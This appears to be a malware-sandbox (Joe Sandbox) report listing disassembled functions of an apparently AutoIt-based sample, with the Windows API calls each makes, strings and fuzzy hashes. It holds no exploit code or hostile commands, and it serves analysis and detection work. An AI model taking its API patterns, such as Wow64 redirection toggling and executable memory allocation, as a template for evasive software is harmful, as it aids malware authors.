Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 3c6b12d415431b95f5b942124b0f72117240b778d4571e45d80128595b52fe53
Instruction ID: 6a8fd666468ac58df95b00770621145d79adfb9da29fcbe339ed99d8b2dba395
Opcode Fuzzy Hash: 3c6b12d415431b95f5b942124b0f72117240b778d4571e45d80128595b52fe53
Instruction Fuzzy Hash: 5F112732248208BAEF205F64CC41FEB77A9EF89B54F010129FA41960A0DA71E811CB10

Function 00B24C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00B24B83,?), ref: 00B24C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B24C56

Strings

Wow64RevertWow64FsRedirection, xrefs: 00B24C50
kernel32.dll, xrefs: 00B24C3F

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 970c650edef38c8d0e580cc4bc0f17965cff5eaaecf186d7d844861b111920af
Instruction ID: 8c108ccb140d90fd97dc5c3f949b265443bb5f525ce7bdca9516c8ad273ec4af
Opcode Fuzzy Hash: 970c650edef38c8d0e580cc4bc0f17965cff5eaaecf186d7d844861b111920af
Instruction Fuzzy Hash: 14D01230510723CFD7205F75E94979A76E4EF06351B11887AD496E6570EB70D480C650

Function 00B24C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00B24BD0,?,00B24DEF,?,00BE52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B24C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B24C23

Strings

Wow64DisableWow64FsRedirection, xrefs: 00B24C1D
kernel32.dll, xrefs: 00B24C0C

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 0bbe06d84b58b74cd788a1b8215d86843f9119705ae1835fe54747e53cc304a1
Instruction ID: c520a2af53c54f5bf4a41a7edb443adac6af69cbc50418c96e76fd9f3ba5dcac
Opcode Fuzzy Hash: 0bbe06d84b58b74cd788a1b8215d86843f9119705ae1835fe54747e53cc304a1
Instruction Fuzzy Hash: D1D01230511723CFD720AFB9ED49796B6E5EF0A352B118C7AD485D6560EBB0D480C650

Function 00BA0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00BA1039), ref: 00BA0DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BA0E07

Strings

RegDeleteKeyExW, xrefs: 00BA0E01
advapi32.dll, xrefs: 00BA0DF0

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: ca6cabfffcba0fa05d0dcda50edc2baa6fe55cc0eecf5127afbc52de250c7532
Instruction ID: ed556a31a115812f66ad89663d690dd0fce5f581e8e4f97279971ace8765f61a
Opcode Fuzzy Hash: ca6cabfffcba0fa05d0dcda50edc2baa6fe55cc0eecf5127afbc52de250c7532
Instruction Fuzzy Hash: 8DD0C230850313CFC3206FB0D809386B2D4EF22345F008CBFD481D2260EBB0D490C600

Function 00B990E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00B98CF4,?,00BAF910), ref: 00B990EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B99100

Strings

GetModuleHandleExW, xrefs: 00B990FA
kernel32.dll, xrefs: 00B990E9

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 883005dfab559f5cfd2cddfe2110aa6af35c6e2f7c1e84eb1803f65c98977967
Instruction ID: 5efbcabe47b0ba14dc4fbb172b91acc236bddc965d0edb83e5e99586b37899e0
Opcode Fuzzy Hash: 883005dfab559f5cfd2cddfe2110aa6af35c6e2f7c1e84eb1803f65c98977967
Instruction Fuzzy Hash: BDD01234510723DFDB209F75D85A69676E5EF06352B158C7ED485E6560EA70C480C650

Function 00B61714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00B61718
__swprintf.LIBCMT ref: 00B61749

Strings

WIN_XPe, xrefs: 00B61788
%.3d, xrefs: 00B61723

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 6ebea564e20be576733742346ce469105e53fec49dd45bd7947d07c1c3a31065
Instruction ID: 75e054afe0a02065b0d2da66d1b8a9d6a257c5402f5760a750bee96b80b3389d
Opcode Fuzzy Hash: 6ebea564e20be576733742346ce469105e53fec49dd45bd7947d07c1c3a31065
Instruction Fuzzy Hash: 01D012B1804119FAC701969498C98F977FCAB09701F1808E2B406E3040E6399F54EA21

Function 00B7717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b626b049e163114dc9ad25a09d7ab803f25ce9f0d6a5bfb1885ca836ac1cb7a6
Instruction ID: d971633a4782a012024b58d41c83b36f3a53462d920f5d45c8498aa6a219860b
Opcode Fuzzy Hash: b626b049e163114dc9ad25a09d7ab803f25ce9f0d6a5bfb1885ca836ac1cb7a6
Instruction Fuzzy Hash: FDC12B75A04216EFCB14CFA4C884AAEBBF5FF48714B1585D8E829EB251DB30DD81DB90

Function 00B9E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00B9E0BE
CharLowerBuffW.USER32(?,?), ref: 00B9E101

Part of subcall function 00B9D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B9D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00B9E301
_memmove.LIBCMT ref: 00B9E314

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 883f3d40c1615ea1f03d364d6f22e84da98c444f20fbc9d1f32087aa804aed7e
Instruction ID: 3950dc3c1ded81cb58246a9ffdd0caa08313d9a9a7b1c6525bef452cab666628
Opcode Fuzzy Hash: 883f3d40c1615ea1f03d364d6f22e84da98c444f20fbc9d1f32087aa804aed7e
Instruction Fuzzy Hash: 6BC15B71608311DFCB14DF28C480A6ABBE4FF89714F1489ADF8A99B351D731EA45CB92

Function 00B98093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B980C3
CoUninitialize.OLE32 ref: 00B980CE

Part of subcall function 00B7D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B7D5D4

VariantInit.OLEAUT32(?), ref: 00B980D9
VariantClear.OLEAUT32(?), ref: 00B983AA

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 410bf24847b2b21afe504352059e26d23df581af177b4aabfbf0709a5d870d09
Instruction ID: 4c0be10fa923f282c194610630768882a29fadf0f59aa612b3ad493d54dd69b8
Opcode Fuzzy Hash: 410bf24847b2b21afe504352059e26d23df581af177b4aabfbf0709a5d870d09
Instruction Fuzzy Hash: D6A15A756047119FCB00DF64D481B2AB7E4FF8A754F1884A8F99A9B3A1CB30ED45CB86

Function 00B77530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00BB2C7C,?), ref: 00B776EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00BB2C7C,?), ref: 00B77702
CLSIDFromProgID.OLE32(?,?,00000000,00BAFB80,000000FF,?,00000000,00000800,00000000,?,00BB2C7C,?), ref: 00B77727
_memcmp.LIBCMT ref: 00B77748

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 0ed1645c5ce8450a6d33323451984b5037863b98361d065fa9d3b39d2bcdceb7
Instruction ID: 6764dbd018c1e62947e7bc7ad6f01f08a8de0c52990fb905ae3fa4332727e5d9
Opcode Fuzzy Hash: 0ed1645c5ce8450a6d33323451984b5037863b98361d065fa9d3b39d2bcdceb7
Instruction Fuzzy Hash: F381FC75A00109EFCB04DFA4C984DEEB7F9FF89315F208598E519AB250DB71AE06CB60

Function 00B7687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B7688E
SysAllocString.OLEAUT32(00000000), ref: 00B76937
VariantCopy.OLEAUT32 ref: 00B76966
VariantClear.OLEAUT32(?), ref: 00B7698D

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 2fa71cfed37ec670030a42712c64df68163ae0e7af163fa15d1a00b30b767155
Instruction ID: fc36f326520370d4f6d64afc9e6393ef61cf1442a14185020ecd149f1563a92d
Opcode Fuzzy Hash: 2fa71cfed37ec670030a42712c64df68163ae0e7af163fa15d1a00b30b767155
Instruction Fuzzy Hash: 1C51D674704B029EDF24AF65D89167AB3E5EF49310F20D8AFE5AEDB291DE30D8408701

Function 00BA97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00CCE688,?), ref: 00BA9863
ScreenToClient.USER32(00000002,00000002), ref: 00BA9896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00BA9903

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: e996608a407c5a428e86cb9dcc7db5ea874ebef228189604b738e884a6cbe93a
Instruction ID: 9e8ce39d6a7b249953adda99ec50c786c88a7bb2facba0a4fa2a829773622b94
Opcode Fuzzy Hash: e996608a407c5a428e86cb9dcc7db5ea874ebef228189604b738e884a6cbe93a
Instruction Fuzzy Hash: 57514034A04209EFCF24CF58C881AAE7BF5FF56360F148199F9559B2A0D730AD41DB90

Function 00B79A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00B79AD2
__itow.LIBCMT ref: 00B79B03

Part of subcall function 00B79D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00B79DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00B79B6C
__itow.LIBCMT ref: 00B79BC3

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 0831bbabfe8ecebebaf8436d5bc412d90ffe8b950d92ef717db5b982f1fda478
Instruction ID: 1c0f017028595e148a72240e9ff0520ecdc3046cac89bdd10064716787d2917a
Opcode Fuzzy Hash: 0831bbabfe8ecebebaf8436d5bc412d90ffe8b950d92ef717db5b982f1fda478
Instruction Fuzzy Hash: CB419274A00218ABDF21DF54D846FEE7BF9EF49710F0040A9F919A7291DB709A44CBA1

Function 00B969AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00B969D1
WSAGetLastError.WSOCK32(00000000), ref: 00B969E1

Part of subcall function 00B29837: __itow.LIBCMT ref: 00B29862
Part of subcall function 00B29837: __swprintf.LIBCMT ref: 00B298AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B96A45
WSAGetLastError.WSOCK32(00000000), ref: 00B96A51

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 84685b9a1562ddc9adf00d5273c57ed93dec2a84fd239d18a3aa117d400654f3
Instruction ID: 8cf81ecfa5ff79368e2fdb4c8c489b011d1b7f3649747ab5d4a7d0d911998cb9
Opcode Fuzzy Hash: 84685b9a1562ddc9adf00d5273c57ed93dec2a84fd239d18a3aa117d400654f3
Instruction Fuzzy Hash: F441BF75600210AFEB20AF64DC86F7A77E4DB15B50F4481A8FA2DAF2C2DA709D008B91

Function 00B9641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00BAF910), ref: 00B964A7
_strlen.LIBCMT ref: 00B964D9

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 007855013d354532cfee764d21839363f54f5c826ff1a1a4fcae28a4d5b3528a
Instruction ID: f81a7b158347d0297b92008398d2603a31d53c0e61ee184ad657f98c6210cca6
Opcode Fuzzy Hash: 007855013d354532cfee764d21839363f54f5c826ff1a1a4fcae28a4d5b3528a
Instruction Fuzzy Hash: 6941A231A00118ABCB14EBA8EC95FBEB7E8AF55310F1481E5F81997292DB30EE40C751

Function 00B8B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B8B89E
GetLastError.KERNEL32(?,00000000), ref: 00B8B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B8B8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B8B915

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: c6ffe21053d078e181180ca0e59e0bdccda335b3ab1c97b4e64eb2a1c2171345
Instruction ID: c5186c08315abb2e712149ce5cc2347abdac58b9b6090ae3da4c550247ad05c0
Opcode Fuzzy Hash: c6ffe21053d078e181180ca0e59e0bdccda335b3ab1c97b4e64eb2a1c2171345
Instruction Fuzzy Hash: 8941E639600621DFCB11EF55D485A59BBE1EF8A350F1980D8ED4AAF362CB30ED41CB96

Function 00BA8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BA88DE

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 86b17edbc4b2dd43b6220919b78ffa51efbce7d24f5f728c9cc6971cf2c48419
Instruction ID: 7f1a05e102a6365f824733fd56157b1236ec158e426683c67a393eb137feb912
Opcode Fuzzy Hash: 86b17edbc4b2dd43b6220919b78ffa51efbce7d24f5f728c9cc6971cf2c48419
Instruction Fuzzy Hash: AA31F234608108BFEB209A58DC85BBA37F5EB07310F544092FA51E7AA1CE30D9409752

Function 00BAAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00BAAB60
GetWindowRect.USER32(?,?), ref: 00BAABD6
PtInRect.USER32(?,?,00BAC014), ref: 00BAABE6
MessageBeep.USER32(00000000), ref: 00BAAC57

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 5c65115c4231091aacce53957b5510dbc3537f6bfcfaf77202e5dbe928fdb08b
Instruction ID: 3b9d15cef0d8fd795d01b20bcd581c0c23f43d68518b0a016714ac216af6c714
Opcode Fuzzy Hash: 5c65115c4231091aacce53957b5510dbc3537f6bfcfaf77202e5dbe928fdb08b
Instruction Fuzzy Hash: BE416F30604219DFDB21DF58D8D4AA97BF5FF4A320F1480E9E4159F261EB30E945CBA2

Function 00B80AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00B80B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00B80B43
